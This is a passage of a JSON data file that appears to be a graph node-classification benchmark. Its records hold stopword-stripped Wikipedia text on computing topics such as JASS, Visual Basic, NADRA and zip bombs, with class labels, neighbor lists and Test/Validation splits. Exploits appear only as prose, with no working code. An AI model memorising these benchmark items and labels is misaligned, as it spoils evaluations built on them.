    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      9455,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Test"
  },
  {
    "node_id": 844,
    "label": 2,
    "text": "Text_Object_Model:text object model text object model tom microsoft windows api provides developers object-based rich text manipulation interfaces implemented com accessed microsoft word additionally richedit controls normally ship windows tom developed influenced heavily wordbasic macro language used within word vba word 95 previous releases tom developed alongside richedit technology present since version 1.0 richedit components api available option windows ce since 2.5 release richedit western languages least used pocket word time version 8.0 richedit shipped windows 8 added support opentype math retrieve implemented instance codice_1 interface top-level document interface codice_2 message may sent via sendmessage api obtain pointer codice_3 object also implements codice_1 interface tom may operate differently depending version richedit control interface retrieved richedit50w windows provide functionality standard richedit20w richedit20a controls like proper table support",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      321,
      1348,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 845,
    "label": 8,
    "text": "Web_tracking:web tracking web tracking practice operators websites collect share information particular user activity world wide web analysis individual user behaviour may used provide content relates implied preferences use web tracking controversial applied context private individual varying degrees subject legislation eu ecommerce directive uk data protection act done without knowledge user may considered breach browser security business-to-business context understanding visitor behaviour order identify buying intentions seen many commercial organisations effective way target marketing activities visiting companies approached on- offline marketing sales propositions relevant current requirements point view sales organisation engaging potential customer actively looking buy produce savings otherwise wasted marketing funds contrary popular belief browser privacy mode prevent tracking attempts usually blocks storage information visitor site cookies help however live data transmissions like various fingerprinting methods fingerprints easily de-anonymized",
    "neighbors": [
      3490,
      2818,
      5133,
      6576,
      10450,
      9395,
      119,
      3643
    ],
    "mask": "Test"
  },
  {
    "node_id": 846,
    "label": 9,
    "text": "JASS:jass jass jass2 sometimes said stand another scripting syntax scripting language provided event-driven api created blizzard entertainment used extensively games jass2 starcraft jass scripting events game world map creators use warcraft iii world editor starcraft editor create scripts triggers ai artificial intelligence custom maps campaigns blizzard entertainment replaced jass galaxy starcraft ii language provides extensive api gives programmers control nearly every aspect game world example execute simple gui functions giving orders units changing weather time day playing sounds displaying text player manipulating terrain jass also create powerful functions trackables detect mouse goes hits position getlocalplayer cause disconnects used improperly using handles getlocalplayer syntax similar turing delphi unlike languages case sensitive jass primarily uses procedural programming concepts though popular user-made modifications blizzard world editor program since added c++-like object-oriented programming features syntax jass following function creates string containing message hello world displays players want one player want print message 90 times show iterator syntax jass similar turing context free examples basic syntax shown jass statically-typed types separated two classes natives handles native types types considered non-native native types behave similarly primitive types programming languages handle types however behave like objects handle types often represent object within game units players special effects etc. similarly java treats objects variables parameters jass handle types treated values reality values nothing references handle objects becomes important dealing garbage collection handles properly cleaned cause significant performance issues additionally local variables properly dereference handles go scope nullified properly handle indices garbage collected eventually leak also references handles take memory space users may experience reduced performance nullified though much smaller scale another property handle types worth noting handle types treated children handle type children types children types handle variables may reference specific handle type children type example since patch 1.24b new handle-based type called agent introduced separate handle types objects deleted manually dynamic memory allocation handle types objects deleted automatically stack-based memory allocation example types unit rect destructable refer dynamic allocated objects extend type agent whereas types race alliancetype actually kind wrappers native type integer compared enumerated types still extend type handle primitive types type casting integer real string officially supported language jass supports implicit explicit type casting implicit casting occurs integer real example jass library provides several functions explicit type casting important property handle types related type casting since variables handles references treated treated integers instance handle assigned unique integer value essentially acts identifier handle therefore type casting handles integers although technically supported jass possible practice implicit casting handle types integer occur code written certain way example game ever reached line return h would fact actually cast handle integer return value however blizzard never intended jass used way jass compiler actually throw error warning programmer function n't returning correct type however jass programmers found exploited famous bug jass compiler syntax checker so-called return bug essentially compiler make sure last return statement function returns correct type therefore following code compiles without error used cast handles integers bug fixed patch 1.23b although completely fixed patch 1.24b users use new hashtable natives instead return bug counterparts bug fixed patch 1.24b another return bug discovered users known return nothing bug return nothing bug fixed blizzard patch 1.23c return nothing bug lets user get last value returned function even another type properly utilize bug desired return must made separate function return calling function made impossible jass supports one-dimensional arrays type excluding code syntax declare arrays access members array outlined code one limitation arrays jass returned functions passed parameters functions though array members may returned function returns unit u 0 may returned u array type unit 2009 return bug shown allow arbitrary code execution registered security vulnerability blizzard entertainment shortly thereafter released patch 1.24 fixed vulnerability jass bug patch deployed map contains script code returns bugs run properly maps using return bugs therefore need re-written use newly available hashtable natives patch currently applied battle.net servers vjass set user-made extensions jass introduces object-oriented programming features language structs encapsulation polymorphism strictly speaking vjass add anything jass library instead mostly uses jass arrays integers used indices extension relies custom-made compiler compiles vjass code strict jass code manner additional mods either world editor program warcraft iii required maps made using vjass code fully compatible copy game even without compiler originally convenient tool use vjass jass newgen pack jngp however jngp suffered lack maintenance leaving incompatible newer warcraft iii versions jngp superseded world editor extended wex work wex stopped also leaving incompatible newer warcraft iii versions jasshelper part warcraft iii allowing vjass used without third party tools jass interpreter warcraft iii version 1.23 n't check memory region boundaries allows execution arbitrary bytecode map meaning practically anything including malware viruses trojans etc engineered map executed infect computer blizzard entertainment aware issue applied temporary workaround games hosted battle.net also preparing permanent fix lan single-player games issue addressed release version 1.24 possible exploit i/o capabilities preload jass native commonly used preload files initialization prevent in-game lag indirectly run code computer certain builds windows operating system via writing batch files startup folder exploit rather limited however requires path impossible retrieve since reading environment variables impossible despite limitations possible use preload native along corresponding natives preloadgenend write files player computer preload exploit made secure officially supported feature warcraft iii files written using preload exploit stored user folder documents\\warcraft iii\\custommapdata windows cause harm preload exploit commonly used custom maps convenient persistent save/load systems sample code following function creates empty file redist\\miles folder used interfere warcraft iii program files making warcraft iii error next run warcraft iii version 1.31 run using either jass2 lua virtual machine specified operate lua virtual machine jass code transpiled lua combined lua code make lua code file facilitate lua virtual machine declarations match jass2 declarations well helper userdata easily accurately emulate jass language features arrays converting code lua using single virtual machine possible jass lua code seamlessly interact allows custom map developers start using lua without manually port existing jass vjass code also avoids problems lack interoperation support increased overhead would occur jass2 lua virtual machines used time due vastly different larger language feature set lua jass2 virtual machine compatibility lua code developers wanting use lua code use lua virtual machine",
    "neighbors": [
      1952,
      2304,
      10145,
      4777,
      2316,
      5677,
      9871,
      435,
      9780,
      11674
    ],
    "mask": "Test"
  },
  {
    "node_id": 847,
    "label": 9,
    "text": "Visual_Basic:visual basic visual basic third-generation event-driven programming language microsoft component object model com programming model first released 1991 declared legacy 2008 microsoft intended visual basic relatively easy learn use visual basic derived basic enables rapid application development rad graphical user interface gui applications access databases using data access objects remote data objects activex data objects creation activex controls objects programmer create application using components provided visual basic program time community programmers developed third-party components programs written visual basic also use windows api requires external function declarations final release version 6 1998 known simply visual basic april 8 2008 microsoft stopped supporting visual basic 6.0 ide microsoft visual basic team still maintains compatibility visual basic 6.0 applications windows vista windows server 2008 including r2 windows 7 windows 8 windows 8.1 windows server 2012 windows 10 windows server 2016 windows server 2019 works program 2014 software developers still preferred visual basic 6.0 successor visual basic .net 2014 developers lobbied new version vb6 programming environment 2016 visual basic 6.0 technical impact award 19th annual d.i.c.e awards dialect visual basic visual basic applications vba used macro scripting language within several microsoft applications including microsoft office like basic programming language visual basic designed easy learning curve programmers create simple complex gui applications programming vb combination visually arranging components controls form specifying attributes actions components writing additional lines code functionality since vb defines default attributes actions components programmer develop simple program without writing much code programs built earlier versions suffered performance problems faster computers native code compilation made less issue though vb programs compiled native code executables version 5 still require presence around 1 mb runtime libraries core runtime libraries included default windows 2000 later extended runtime components still installed earlier versions windows 95/98/nt require runtime libraries distributed executable forms created using drag-and-drop techniques tool used place controls e.g. text boxes buttons etc form window controls attributes event handlers associated default values provided control created may changed programmer many attribute values modified run time based user actions changes environment providing dynamic application example code inserted form resize event handler reposition control remains centered form expands fill form etc inserting code event handler keypress text box program automatically translate case text entered even prevent certain characters inserted visual basic create executables exe files activex controls dll files primarily used develop windows applications interface database systems dialog boxes less functionality used provide pop-up capabilities controls provide basic functionality application programmers insert additional logic within appropriate event handlers example drop-down combination box automatically displays list user selects element event handler called executes code programmer created perform action list item alternatively visual basic component user interface instead provide activex objects programs via component object model com allows server-side processing add-in module runtime recovers unused memory using reference counting depends variables passing scope set nothing avoiding problem memory leaks possible languages large library utility objects language provides basic support object-oriented programming unlike many programming languages visual basic generally case-sensitive—though transforms keywords standard case configuration forces case variable names conform case entry symbol table string comparisons case sensitive default visual basic compiler shared visual studio languages c c++ nevertheless default restrictions ide allow creation targets windows model dlls threading models years developers bypassed restrictions visual basic builds upon characteristics basic visual basic 1.0 introduced 1991 drag drop design creating user interface derived prototype form generator developed alan cooper company called tripod microsoft contracted cooper associates develop tripod programmable form system windows 3.0 code name ruby relation later ruby programming language tripod include programming language microsoft decided combine ruby basic language create visual basic ruby interface generator provided visual part visual basic combined eb embedded basic engine designed microsoft abandoned omega database system ruby also provided ability load dynamic link libraries containing additional controls called gizmos later became vbx interface microsoft developed derivatives visual basic use scripting visual basic derived heavily basic subsequently replaced .net platform version derived languages earlier versions visual basic prior version 5 compiled code p-code p-code interpreted language runtime benefits p-code include portability smaller binary file sizes usually slows execution since runtime adds additional layer interpretation visual basic applications require microsoft visual basic runtime msvbvmxx.dll xx relevant version number either 50 60 msvbvm60.dll comes standard windows editions windows 98 windows 7 editions windows 7 include windows 95 machine would however require inclusion installer whichever dll needed program visual basic 5 6 compile code either native p-code either case runtime still required built functions forms management criticisms levelled visual basic editions prior vb.net include versions visual basic development environment 1.0 6.0 retired microsoft 2008 therefore longer supported associated runtime environments also unsupported except visual basic 6 core runtime environment microsoft officially supports lifetime windows 8 windows 10 third party components shipped visual studio 6.0 included support statement legacy visual basic components may still work newer platforms despite unsupported microsoft vendors documentation visual basic 6.0 application programming interface tools best covered last msdn release visual studio.net 2002 later releases msdn focused .net development significant parts visual basic 6.0 programming documentation removed language evolved support older code ended although vendor support visual basic 6 ended product never supported latest versions windows key parts environment still work newer platforms possible get subset development environment working 32-bit 64-bit versions windows vista windows 7 windows 8 windows 10 following code snippet displays message box saying hello world window loads private sub form_load end sub snippet makes counter moves 1 every second label timer control need added form work form closed integer overflow occurs option explicit dim count integer private sub form_load end sub private sub timer1_timer end sub",
    "neighbors": [
      9216,
      2055,
      6154,
      7691,
      10253,
      4627,
      22,
      3613,
      9245,
      8227,
      4136,
      5677,
      9263,
      11315,
      5684,
      6709,
      8246,
      9780,
      6718,
      4160,
      4674,
      8262,
      4173,
      4174,
      8273,
      83,
      603,
      92,
      7771,
      6751,
      608,
      2656,
      2658,
      5733,
      5225,
      7274,
      9330,
      5747,
      3705,
      5754,
      6778,
      7292,
      9345,
      3718,
      2183,
      5768,
      6797,
      9871,
      10387,
      1172,
      10900,
      10902,
      11412,
      3224,
      3736,
      9881,
      11414,
      3230,
      7326,
      3233,
      4770,
      5281,
      8866,
      8868,
      4777,
      10921,
      7343,
      7355,
      7870,
      8385,
      1730,
      6338,
      5830,
      712,
      5320,
      5833,
      6347,
      11472,
      7889,
      214,
      9434,
      219,
      4316,
      736,
      10470,
      3303,
      4327,
      4840,
      10474,
      11498,
      4844,
      3821,
      8429,
      10478,
      10991,
      759,
      6398,
      6910,
      9988,
      263,
      3339,
      1805,
      9997,
      786,
      9490,
      11030,
      5401,
      8473,
      797,
      6430,
      4384,
      5921,
      3876,
      5925,
      11559,
      10026,
      8494,
      303,
      7983,
      6450,
      11570,
      11571,
      823,
      4410,
      315,
      10239,
      7486,
      1343,
      321,
      1347,
      1348,
      5450,
      8524,
      847,
      11602,
      10068,
      2901,
      1366,
      1879,
      10586,
      8539,
      2401,
      3425,
      2915,
      7523,
      7524,
      6502,
      11625,
      8554,
      7022,
      3960,
      4989,
      2943,
      10624,
      3462,
      5511,
      8582,
      5521,
      7064,
      3481,
      4505,
      1435,
      11674,
      929,
      5027,
      11683,
      8101,
      4010,
      10666,
      10157,
      6074,
      963,
      5059,
      8644,
      7629,
      9166,
      2002,
      11219,
      5588,
      2519,
      4057,
      477,
      1501,
      11229,
      4576,
      6112,
      8161,
      9188,
      4069,
      11243,
      5612,
      2541,
      4590,
      3573,
      9205,
      1016,
      2556,
      2045,
      10750,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 848,
    "label": 1,
    "text": "Nadra:nadra national database registration authority nadra urdu نادرا commonly called nadra independent autonomous agency ministry interior government pakistan regulates government databases statistically manages sensitive registration database national citizens pakistan nadra also responsible issuing computerized national identity cards citizens pakistan maintaining sensitive informational upgraded government databases securing national identities citizens pakistan stolen theft one largest government database institution employing 11,000 people 800 domestic offices five international offices also claims hold record maintaining largest biometric database citizens world codified second amendment §30 constitution pakistan 2000 constitution grants powers nadra enact civil registration sensitive databases pakistan citizens databases kept extreme secrecy security ensure safety citizen databases 2018 directed headed usman yousaf mobin chief technology officer nadra appointed chairman independence pakistan prime minister liaquat ali khan launched personal identity system pis program register manage issue national identification cards citizens pakistan muslim refugees settling pakistan changes carried election commission pakistan 1965 process voter registration hold nationwide 1965 presidential election 1969–70 amendments pis program continued election commission election commission supervised 1970 general elections 1971 war resulted east-pakistan gaining independence bangladesh new statistical database system needed ensure safety pakistan citizens well national security country questions raised pakistani bhutto regime introduced national registration act parliament pakistan establish authority issue photo ids registered pakistani citizens 1973 new database system codified second amendment §30 constitution pakistan perform contain statistical database citizens pakistan registration pakistan citizens statistic database government computer accounts started 1973 promulgation constitution country new program visioned started prime minister zulfikar ali bhutto 1973 parliamentary session bhutto stated parliament people pakistan due absence full statistical database people country country operating utter darkness government started issuing national identity card nic numbers citizens started establish government databases people government computers national database registration authority nadra established 10 march 2000 merging directorate general registration pakistan department created 1973 constitution national database organization ndo attached department ministry interior government pakistan created 1998 census nadra autonomous body operate independently mandate replace old directorate general registration computrised system registering 150 million citizens nadra launched multi-biometric national identity card project developed conformance international security documentation issuance practices year 2000 program replaced paper based personal identity system pakistan use since 1973 date 96 million citizens pakistan abroad utilized system allied services receive tamper-resistant iso standard identification documents computerised national identity card cnic computerised national identity card issued nadra pakistani citizens cnic introduced 2000 2012 89.5 million cnics issued cnic issued first age 18 pakistani law compulsory carry one however pakistani citizens cnic mandatory thus seen de facto necessity meaningful civic life pakistan pakistan adult citizens must register computerised national identity card cnic unique number upon reaching age 18 serves identification document authenticate individual identity citizen pakistan introduction cnic manual national identity cards nics issued citizens pakistan today government shifted existing records national identity cards nic central computerised database managed nadra new cnic machine-readable carry facial fingerprint information every citizen required nic number number required many activities getting driver licence passport registering vehicle receiving social insurance/zakat funding enrolling school college technical institute filing legal affidavit wiring funds paying taxes opening bank account getting utility connection electricity phone mobile phone water sewer natural gas etc however since births country registered pakistanis conduct activities described id cards 2007 nadra announced issued 60 million cnic c standing computerized numbers approximately one-third population authority issued 10 millionth cnic 11 february 2002 20 millionth 18 june 2002 30 millionth 22 december 2003 40 millionth 1 october 2004 50 millionth cnic 14 february 2006 unique 13-digit number assigned birth parents complete child birth registration form form rg-2 commonly known b-form child registration certificate crc national identity card nic number issued age 18 2001 nic numbers 11 digits long 2001-2002 authority started issuing 13-digit nic numbers along new biometric id cards first 5 digits based applicant locality next 7 random numbers last digit check digit even number females odd number males old manual nic numbers invalid 1 january 2004 id card following information legal name gender male female transgender father name husband name married females identification mark date birth national identity card number family tree id number current address permanent address date issue date expiry signature photo fingerprint thumbprint nadra also records applicant religion noted cnic nadra registered 90 women pakistan although nadra started issuing ultra modern scnic smart computerized national identity card information english urdu languages nadra introduced smart national identity card snic pakistan first national electronic identity card october 2012 pakistan snic contains data chip 36 security features snic complies icao standard 9303 iso standard 7816-4 snic used offline online identification voting pension disbursement social financial inclusion programmes services nadra aims replace 89.5 million cnics snics 2020 order address security concerns nadra incorporated 36 security features physical design card making one securest cards world card printed multiple layers layer security features chip encrypted extremely competent software developers nadra secure communication protocols determined read remote devices enable remote verification citizens match-on-card applet designed nadra citizen places card card reader reader first authenticate card return card verify authenticity reader verifications successful device ask finger lpc nadra card enable verifications individuals remotest parts pakistan say decade individual casts vote government may ascertain person casting vote indeed one electoral roll one thousands scenarios identity fraud prevention card empowers majority space chip made available private sector use products services might appear expensive private sector use card initially number citizens critical mass reached profitable private sector use secure universal platform order track nadra smart card tracking id consisting 12 digits sent 8400 example tracking id 108231064935 message sent 8400 get message request tracking id 108231064935 printing facility expected delivery 2 working days nadra started service online application nicop poc crc online data collected e.g fingerprints thumb impressions signatures online fee submitted debit credit card",
    "neighbors": [
      10572,
      4631
    ],
    "mask": "Test"
  },
  {
    "node_id": 849,
    "label": 5,
    "text": "Echo_Protocol:echo protocol echo protocol service internet protocol suite defined rfc 862 originally proposed testing measurement round-trip times ip networks host may connect server supports echo protocol using transmission control protocol tcp user datagram protocol udp well-known port number 7 server sends back identical copy data received unix-like operating systems echo server built inetd family daemons echo service usually enabled default may enabled adding following lines file /etc/inetd.conf telling inetd reload configuration various routers tcp udp port 7 echo protocol relaying icmp datagrams port 9 discard protocol also configured default proxy relay wake-on-lan wol magic packets internet hosts local network order wake remotely hosts must also network adapter configured accept wol datagrams router must proxy setting enabled possibly also configuration forwarding rules embedded firewall open ports internet side",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      4495,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      933,
      2085,
      3751,
      3752,
      8998,
      9381,
      10924,
      562,
      2996,
      9909,
      6651,
      10171,
      3133,
      829,
      3006,
      4797,
      5181,
      5437,
      8386,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10341,
      871,
      10344,
      11112,
      367,
      8432,
      891
    ],
    "mask": "None"
  },
  {
    "node_id": 850,
    "label": 2,
    "text": "Matthew_Dillon:matthew dillon matthew dillon born 1966 american software engineer known amiga software contributions freebsd starting leading dragonfly bsd project since 2003 dillon studied electronic engineering computer science university california berkeley first became involved bsd 1985 also became known amiga programming c compiler dice work linux kernel founded worked best internet 1994 1997 contributing freebsd time diablo internet news transit program popular many isps 1997 dillon gained commit access freebsd code heavily contributed virtual memory subsystem amongst contributions concerned problems saw direction freebsd 5.x headed regards concurrency coupled fact dillon access freebsd source code repository revoked due falling-out freebsd developers started dragonfly bsd project 2003 implementing smp model using light-weight kernel threads dragonfly project also led development new userspace kernel virtualisation technique 2006 called virtual kernel originally ease development testing subsequent kernel-level features new file system called hammer created using b-trees hammer declared production-ready dragonfly 2.2 2009 subsequently hammer2 declared stable 2018 dragonfly 5.2 recently dillon gotten number headlines around cpu errata 2007 theo de raadt openbsd raised alarm around seriousness errata intel core 2 family cpus dillon independently evaluated intel errata overview intel core errata well suggesting several erratums serious warrant avoiding processor issues remain unfixed dillon since fan amd processors subsequently 2012 discovered brand-new deficiency amd processors existing erratum existed time matt continued work around cpu issues late 2018 presenting solutions tackle latest security vulnerabilities like meltdown subsequently adopted openbsd well matt frequent guest bsdtalk runtime show interviewed several times kerneltrap",
    "neighbors": [
      10761,
      2061,
      9743,
      9236,
      8725,
      4636,
      9249,
      9762,
      1071,
      1080,
      5177,
      58,
      9784,
      3651,
      7748,
      8266,
      5709,
      5710,
      7249,
      9306,
      607,
      1637,
      9320,
      11370,
      5743,
      8816,
      9844,
      633,
      8316,
      9343,
      2180,
      4745,
      5264,
      2193,
      3233,
      2212,
      684,
      3248,
      8369,
      8373,
      1718,
      5819,
      11459,
      10436,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      7907,
      9452,
      11506,
      1273,
      7425,
      1801,
      10000,
      274,
      11539,
      3350,
      10016,
      1316,
      6438,
      8998,
      10535,
      4908,
      1839,
      7983,
      9009,
      11573,
      11076,
      10570,
      6491,
      7521,
      8546,
      1891,
      873,
      7027,
      11123,
      2421,
      2424,
      7552,
      5506,
      1927,
      9625,
      1946,
      5534,
      8618,
      6062,
      432,
      11698,
      8115,
      1465,
      3006,
      9151,
      9153,
      4564,
      10202,
      4571,
      3551,
      8671,
      998,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Validation"
  },
  {
    "node_id": 851,
    "label": 4,
    "text": "Christopher_Tarnovsky:christopher tarnovsky christopher tarnovsky born 20 april 1971 nyack new york integrated circuit reverse engineering specialist hacker come public attention tarnovsky diagnosis attention deficit hyperactivity disorder 1990s tarnovsky soldier united states army field intelligence security cryptography 2013 tarnovsky vice president semiconductor services ioactive 2001 directv client nds company majority owned rupert murdoch newscorp demanded tarnovsky kept away systems plaintiffs directv dish network nagrastar alleged tarnovsky hacking protections placed set-top box smart cards used lock transmission customers defaulted 1997 2007 tarnovsky worked nds developing copy protection technology 2002 canal plus french premium cable television commenced civil action nds tarnovsky tarnovsky alleged extracted source code seca card 26 march 1999 uploaded file sharing website jury later largely cleared nds tarnovsky 2008 tarnovsky dismissed nds copyright infringement employ tarnovsky denies accusation 2008 tarnovsky broke trusted platform module type chip used xbox 360 example tarnovsky required nine months study discover main contents module 2010 black hat washington dc conference tarnovsky described used acid electron microscope small conductive needles hack infineon sle66 cl pe chip",
    "neighbors": [
      2416,
      4212,
      7354,
      4956,
      10173
    ],
    "mask": "Test"
  },
  {
    "node_id": 852,
    "label": 9,
    "text": "Kateryna_Yushchenko_(scientist):kateryna yushchenko scientist kateryna lohvynivna yushchenko december 8 1919 chigirin died august 15 2001 ukrainian computer information research scientist corresponding member ussr academy sciences 1976 member international academy computer science developed one world first high-level languages indirect address programming called address programming language period academic career yushchenko supervised 45 ph.d students professional achievements include yushchenko awarded two ussr state prizes ussr council ministers prize academician glushkov prize order princess olga yushchenko first woman ussr become doctor physical mathematical sciences programming kateryna lohvynivna yushchenko née rvacheva born 1919 chyhyryn central ukraine started undergraduate studies kyiv university 1937 second world war attended central asian state university tashkent graduating 1942 war returned ukraine 1950 direction boris gnedenko obtained ph.d. institute mathematics ukrainian academy sciences period seven years yushchenko held position senior researcher kiev institute mathematics ukrainian ssr academy sciences 1950–57 1954 levedev laboratory first computer continental europe mesm created transferred institute mathematics yushchenko member joint group scholars operating mesm 1957 became director institute computer science ukrainian ssr academy sciences forty years service institute yushchenko created internationally notable scientific school theoretical programming yushchenko best known creation address programming language first fundamental advancement scientific school theoretical programming language provided free location program computer memory process working mesm became clear complex tasks difficult solve writing simple machine programs need develop high-level programming language problem absence appropriate translator better human/computer communication l.i kaluzhnin professor kyiv university taught course mathematical logic 1950-70s made significant advancement understanding problem formalized scheme interfacing program following development 1955 yushchenko developed programming language language-based two general principles computer work addressing software management creating convenient system concepts describing computer architecture system instructions language thus became means manipulation second-rank addresses yushchenko ’ contribution became first fundamental achievement soviet school theoretical programming well ahead creation first programming language fortran 1958 cobol 1959 algol 1960 yushchenko founder first soviet school theoretical programming 1970-1980 subject research theoretical programming formed major achievements school time creation algebraic grammar methods synthesis software 1990s efforts school theoretical programming concentrated study algebraic grammar-methods knowledge representation model computation friendly user interface designing developing databases knowledge bases decision support systems expert systems methods learning forty years research theoretical programming enriched formal-algorithmic apparatus subject research significantly expanded procedural languages methods knowledge representation form artificial intelligence tools developers application systems yushchenko worked probability theory algorithmic languages programming languages developing methods automated data processing systems prepare programmers yuschenko wrote educational series textbooks 1970s yuschenko held five copyright certificates developed eight state standards ukraine author 200 manuscripts including 23 monographs train aids part works two to-three editions translated 5 languages internationally including german czech hungarian french danish",
    "neighbors": [
      2901,
      8262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 853,
    "label": 1,
    "text": "Database_connection:database connection database connection facility computer science allows client software talk database server software whether machine connection required send commands receive answers usually form result set connections key concept data-centric programming since dbms engines require considerable time connect connection pooling invented improve performance command performed database without open available connection connections built supplying underlying driver provider connection string way addressing specific database server instance well user authentication credentials example server=sql_box database=common user id=uid pwd=password connection built opened closed properties command time-out length transaction one exists set connection string composed set key/value pairs dictated data access interface data provider used many databases postgresql allow one operation performed time connection request data sql select statement sent database result set returned connection open available operations client finishes consuming result set databases like sql server 2005 later impose limitation however databases provide multiple operations per connection usually incur far overhead permit single operation task time database connections finite expensive take disproportionately long time create relative operations performed inefficient application create use close database connection whenever needs update database connection pooling technique designed alleviate problem pool database connections created shared among applications need access database application needs database access requests connection pool finished returns connection pool becomes available use applications connection object obtained connection pool often wrapper around actual database connection wrapper understands relationship pool hides details pool application example wrapper object implement close method called like close method database connection unlike method database connection method wrapper may actually close database connection instead return pool application need aware connection pooling calls methods wrapper object approach encourages practice opening connection application needed closing soon work done rather holding connection open entire life application manner relatively small number connections service large number requests also called multiplexing client/server architecture hand persistent connection typically used server state managed state includes server-side cursors temporary products connection-specific functional settings application failure occurs connection pool overflows occur connection pool use application requests connection example application may use connection long many clients attempt access web site one operations blocked simply inefficient",
    "neighbors": [
      2688,
      11392,
      2183,
      9481,
      4490,
      1035,
      10505,
      6417,
      10258,
      10518,
      11030,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      1703,
      1964,
      10413,
      5550,
      9263,
      5808,
      2994,
      10418,
      9527,
      3768,
      3004,
      3388,
      9661,
      4416,
      2369,
      11457,
      8006,
      8518,
      72,
      2901,
      9942,
      9177,
      987,
      860,
      8539,
      9183,
      11362,
      2404,
      10471,
      8808,
      6383,
      3573,
      9079,
      2681,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 854,
    "label": 2,
    "text": "Nokia_E66:nokia e66 nokia e66 slider smartphone nokia eseries range s60 platform third edition device slide action targeting business users successor nokia e65 shares many features e66 similar features nokia e71 handset lacks sufficient battery capacity day use full qwerty however e66 smaller size weighs less e66 also includes accelerometer new animations transition effects lacking e71 2.5 mm 3/32 audio port suitable traditional 3.5 mm 1/8 headphones plugs microusb port used charge mobile dial 0000 check firmware version",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      2208,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 855,
    "label": 4,
    "text": "Zip_bomb:zip bomb zip bomb also known zip death decompression bomb malicious archive file designed crash render useless program system reading often employed disable antivirus software order create opening traditional viruses rather hijacking normal operation program zip bomb allows program work intended archive carefully crafted unpacking e.g virus scanner order scan viruses requires inordinate amounts time disk space memory modern antivirus programs detect whether file zip bomb avoid unpacking zip bomb usually small file ease transport avoid suspicion however file unpacked contents system handle one example zip bomb file 42.zip zip file consisting 42 kilobytes compressed data containing five layers nested zip files sets 16 bottom layer archive containing 4.3-gigabyte 4 294 967 295 bytes 3.99 gib file total 4.5 petabytes 4 503 599 626 321 920 bytes 3.99 pib uncompressed data file still available download various websites across internet many anti-virus scanners layers recursion performed archives help prevent attacks would cause buffer overflow out-of-memory condition exceed acceptable amount program execution time zip bombs often always rely repetition identical files achieve extreme compression ratios dynamic programming methods employed limit traversal files one file followed recursively level effectively converting exponential growth linear also zip files uncompressed yield identical copies sophisticated form zip bombs exploits specifications zip files deflate compression algorithm create bombs without use nested layers used 42.zip",
    "neighbors": [
      1474,
      8930,
      10210,
      2213,
      3525,
      2251,
      2095,
      11444,
      11351,
      2423
    ],
    "mask": "Test"
  },
  {
    "node_id": 856,
    "label": 7,
    "text": "UKFast:ukfast ukfast.net ltd business-to-business hosting company based manchester uk principally known managed hosting cloud services colocation business owns operates data centre complex trafford park manchester ukfast founded september 1999 welsh businessman lawrence jones partner gail jones 2007 company moved head office 28th floor city tower manchester acquired space 16th floor moving 2013 campus birley fields area hulme manchester 2013 firm launched ecloud range cloud hosting services whose hardware infrastructure reportedly cost £12 million build year business turned £23.4m year ending 31 december 2014 ukfast reported 24 per cent turnover increase £23.4m £28.9m 2011 2015 ukfast invested £25m capital expenditure projects including development four data centres flagship ukfast campus founder lawrence jones rejected reported £200m takeover bid 2014 amidst trend web hosting consolidation citing business still growing 2013 ukfast opened office glasgow 2015 opened office london 2018 30 stake ukfast sold private equity firm inflexion 2005 2009 ukfast six internet service providers association awards named best hosting provider four years running ukfast received data centre solutions awards ’ private cloud product year 2012 datacenterdynamics award innovation outsourcing 2013 year ukfast received national business awards employer year award institute customer service employee engagement strategy year awards ukfast also featured sunday times 100 best small companies work great place work institute ’ best workplaces lists placing 28th 12th respectively 2014 25th 5th respectively 2013 45th 7th respectively 2012",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 857,
    "label": 4,
